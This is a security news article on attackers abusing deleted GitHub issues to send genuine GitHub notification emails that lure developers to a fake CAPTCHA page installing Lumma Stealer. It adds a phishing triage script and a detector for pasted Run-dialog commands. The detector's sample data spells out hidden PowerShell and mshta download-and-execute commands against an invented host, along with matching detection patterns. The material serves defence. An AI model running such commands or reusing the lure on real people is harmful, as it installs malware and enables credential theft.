Hackers Exploit GitHub Notifications to Spread Malware

Malware distributors have adopted a new way to deliver malicious email that appears to come from the GitHub Security Team. The messages are sent through GitHub's own notification servers, so they arrive from a legitimate GitHub address and pass the sender checks a mail gateway would normally apply. The targets are developers and project maintainers on GitHub, and the goal is to get malware running on their machines.

How the Attack Works

The attack begins when the attackers open an issue in the targeted project's GitHub repository, with a body written to look like a message from the GitHub Security Team. They delete the issue immediately after posting it, but by then GitHub has already emailed a notification about it to the project's maintainers and watchers. The email is a genuine GitHub notification, sent from GitHub's servers; only its content is attacker-controlled, and because the issue no longer exists the recipient cannot open it on GitHub to check the context. That combination is what makes the technique particularly dangerous.

The email urges the recipient to visit an external website "for more information". There, the visitor is asked to complete a verification step, supposedly to prove they are not a robot. Instead of a real CAPTCHA, the page tells them to press a sequence of keys that opens the Windows Run dialog and pastes and executes a command the page has placed on the clipboard. Following these instructions downloads and runs the Lumma Stealer malware (also written LUMMASTEALER), which harvests sensitive data including access tokens and keys, cryptocurrency wallets, saved passwords and browser session data.

The Role of GitHub Notifications

GitHub notifications are central to this attack. Because the emails are sent by GitHub's real mail servers, they pass SPF, DKIM and DMARC checks and come from a sender with a good reputation, so many phishing filters never flag them. The attacker controls only the body, and that is enough to create the illusion of an official request; many developers follow the instructions and infect their own systems.

A second problem is how GitHub structures its notifications. The emails carry little context beyond the issue text itself, so a recipient has no easy way to see that the "security notice" was written by an arbitrary GitHub account rather than by GitHub staff; the attacker gets to set the whole context, which makes the phishing attempt harder to spot. The one thing the attacker cannot hide is the account that created the issue: its username appears in the notification's header fields, and it can only be disguised with a lookalike name. GitHub has already received reports of this technique, and there have been suggestions to change the notification format to reduce the risk of similar incidents.
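A triage check that a mail gateway or a maintainer's own mail filter could apply is shown below. It is an added example, not code from the original article or from GitHub, and it is deliberately offline: it assumes the upstream gateway has already verified SPF/DKIM, and it only inspects the message. The header names `X-GitHub-Sender` and `X-GitHub-Reason` are the ones GitHub attaches to notification mail; the two sample messages, the repository `example-org/widget`, the account names and the `github-scanner.example` host are all constructed for the example. The point it demonstrates is the one the article makes: a message from `notifications@github.com` can be perfectly genuine and still be a phish, so the check has to look at who posted the issue and where the body's links go, not at the sending domain.

```python
import email
import re
from email import policy
from urllib.parse import urlparse

# Hosts a GitHub notification legitimately links to. Any other link in a
# "security notice" is attacker-chosen content, not GitHub's.
GITHUB_HOST = "github.com"

# Wording an attacker uses to pass an ordinary issue off as a staff message.
STAFF_CLAIM = re.compile(
    r"github\s+(?:security|support|trust\s*&\s*safety)\s+team", re.IGNORECASE
)
URL_RE = re.compile(r"""https?://[^\s<>"')\]]+""")


def is_github_host(url: str) -> bool:
    """True if the URL's host is github.com or a subdomain of it."""
    host = (urlparse(url).hostname or "").lower()
    return host == GITHUB_HOST or host.endswith("." + GITHUB_HOST)


def triage_notification(raw_message: str) -> dict:
    """Classify one raw RFC 822 message as 'spoofed_origin', 'suspicious' or 'clean'."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    from_header = str(msg.get("From", "")).lower()
    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part is not None else ""

    # Headers GitHub adds to every notification: the login of the account whose
    # action triggered the mail, and why the recipient got it.
    sender_login = str(msg.get("X-GitHub-Sender", ""))
    reason = str(msg.get("X-GitHub-Reason", ""))

    from_github = from_header.endswith("<notifications@github.com>") or \
        from_header == "notifications@github.com"
    external_links = sorted({u for u in URL_RE.findall(body) if not is_github_host(u)})
    claims_staff = bool(STAFF_CLAIM.search(body))

    reasons = []
    if not from_github:
        verdict = "spoofed_origin"
        reasons.append("From header is not GitHub's notification address")
    else:
        if claims_staff:
            # Staff notices are not delivered as issue comments from user accounts.
            reasons.append(f"issue text claims to be GitHub staff but was posted by '{sender_login}'")
        if external_links:
            reasons.append("body links outside github.com: " + ", ".join(external_links))
        verdict = "suspicious" if reasons else "clean"

    return {
        "from_github": from_github,
        "sender_login": sender_login,
        "reason": reason,
        "claims_staff": claims_staff,
        "external_links": external_links,
        "verdict": verdict,
        "reasons": reasons,
    }


# Constructed sample: the attacker-authored issue notification described in the article.
PHISHING_SAMPLE = """\
From: "secur1ty-team-gh" <notifications@github.com>
To: maintainer@example.org
Subject: [example-org/widget] Security Alert: unauthorized access detected (Issue #123)
Message-ID: <example-org/widget/issues/123@github.com>
List-Id: widget <widget.example-org.github.com>
X-GitHub-Sender: secur1ty-team-gh
X-GitHub-Reason: subscribed
Content-Type: text/plain; charset=utf-8

Hello,

This is the GitHub Security Team. We detected a login to your account from an unknown location.
Please verify your identity here: https://github-scanner.example/verify?u=maintainer

--
Reply to this email directly or view it on GitHub:
https://github.com/example-org/widget/issues/123
"""

# Constructed sample: an ordinary mention from a collaborator.
LEGIT_SAMPLE = """\
From: "alice-dev" <notifications@github.com>
To: maintainer@example.org
Subject: Re: [example-org/widget] Build fails on Python 3.12 (Issue #124)
Message-ID: <example-org/widget/issues/124@github.com>
X-GitHub-Sender: alice-dev
X-GitHub-Reason: mention
Content-Type: text/plain; charset=utf-8

@maintainer the test run fails on 3.12, log is at
https://github.com/example-org/widget/actions/runs/42
"""

if __name__ == "__main__":
    for sample in (PHISHING_SAMPLE, LEGIT_SAMPLE):
        result = triage_notification(sample)
        print(result["verdict"], result["sender_login"], result["reasons"])
```

The check does not try to confirm that the issue still exists, because that needs a network call; a gateway that can make one should also treat "the linked issue returns 404 minutes after the notification" as a strong signal, since that is exactly the post-then-delete pattern described above.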

Fake CAPTCHA and Malware Installation

The second stage of the attack is a fake CAPTCHA page. Instead of the usual image-selection task, the visitor is told to open the Windows Run dialog (Win+R), paste, and press Enter. The pasted command fetches a file disguised as a legitimate system application and executes it on the victim's computer, which installs the stealer.
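On the endpoint, the Run-dialog step leaves a distinctive trace: the command the victim pastes starts as a child of `explorer.exe` (the process that hosts the Run dialog and the Start menu), it is almost always an interpreter or downloader, and its command line carries a URL, a download cradle, a hidden-window flag, or the "I am not a robot" comment that lures append so the Run box looks harmless. The following detector, an added example that is not from the original article or from any vendor product, scores process-creation events on those indicators. The events are constructed here as plain dictionaries with Sysmon-style field names (`ParentImage`, `Image`, `CommandLine`, `User`) and the `captcha-check.example` host is invented; a real deployment would feed it Sysmon Event ID 1 or EDR telemetry.

```python
import re

# Interpreters and downloaders that fake-CAPTCHA lures typically have the
# victim paste into Win+R. Anything else launched from Run is left alone.
LOLBINS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "msiexec.exe", "curl.exe", "bitsadmin.exe", "certutil.exe",
}

# (indicator name, pattern over the command line). Order is preserved in output.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle", re.compile(
        r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|invoke-expression|iex|curl|certutil)\b",
        re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
    # Lures append "# I am not a robot - reCAPTCHA ..." so the Run box shows
    # reassuring text; the comment survives into the process command line.
    ("captcha_comment", re.compile(r"#.*(?:robot|captcha|verif)", re.I)),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> list:
    """Return the indicator names matched by one process-creation event."""
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return []  # not launched from Run / Start; out of scope for this rule
    if basename(event.get("Image", "")) not in LOLBINS:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, pattern in INDICATORS if pattern.search(cmd)]


def flag_clickfix(events: list, min_indicators: int = 2) -> list:
    """Events that look like a pasted fake-CAPTCHA command, with their indicators."""
    flagged = []
    for event in events:
        hits = score_event(event)
        if len(hits) >= min_indicators:
            flagged.append({"event": event, "indicators": hits})
    return flagged


# Constructed sample telemetry. The first two records mimic the attack stage;
# the last two are ordinary developer activity that must not be flagged.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://captcha-check.example/v.txt | iex"',
     "User": r"CORP\dev"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://captcha-check.example/robot.mp4 # I am not a robot - reCAPTCHA Verification ID: 7811",
     "User": r"CORP\dev"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1",
     "User": r"CORP\dev"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell",
     "User": r"CORP\dev"},
]

if __name__ == "__main__":
    for hit in flag_clickfix(SAMPLE_EVENTS):
        print(hit["event"]["User"], basename(hit["event"]["Image"]), hit["indicators"])
```

Requiring two indicators keeps a developer who simply types `powershell` into Run out of the alert queue while still catching both the PowerShell cradle and the `mshta` variant. For forensics after the fact, the same pasted command is also recorded under the user's `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` key, which is worth collecting alongside the process telemetry.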
